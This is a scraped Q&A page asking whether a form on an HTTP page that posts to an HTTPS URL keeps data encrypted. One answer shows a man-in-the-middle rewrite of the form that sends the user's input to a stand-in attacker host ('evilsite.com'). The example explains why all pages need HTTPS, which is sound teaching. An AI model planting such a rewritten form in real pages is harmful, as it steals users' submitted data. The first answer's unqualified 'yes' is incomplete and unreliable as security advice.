Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Is info still encrypted if I use a <form action="https"> from a regular http page?

Tags:

html

post

ssl

Say I'm at the url http://mysite.com/form.html. When viewing source, I see

<form method="post" action="https://mysite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>

If I hit the submit button, will the form information be encrypted when it's sent to the process page/controller?

like image 601
John Avatar asked Mar 30 '10 15:03

John


People also ask

Is https data encrypted?

What information does HTTPS protect? HTTPS encrypts nearly all information sent between a client and a web service.

What is form action in HTML?

The formaction attribute specifies where to send the form-data when a form is submitted.


2 Answers

Yes - the data in the form will be sent encrypted using the usual handshake that SSL implements. From there you can choose to keep your user under SSL, or throw them back to a standard connection using a session identifier.

like image 186
Seidr Avatar answered Sep 30 '22 19:09

Seidr


There is no guarantee that it will be encrypted, or that the submitted data will reach your website.

Since the original response was over http, a man-in-the-middle could have altered your html source, or could have inserted some javascript to modify the action parameter of your form. Thus, your form could read like this when it reaches the browser

<form method="post" action="https://evilsite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>

Which means that you MUST use HTTPS on all your pages if you want to be secure.

like image 45
Sripathi Krishnan Avatar answered Sep 30 '22 19:09

Sripathi Krishnan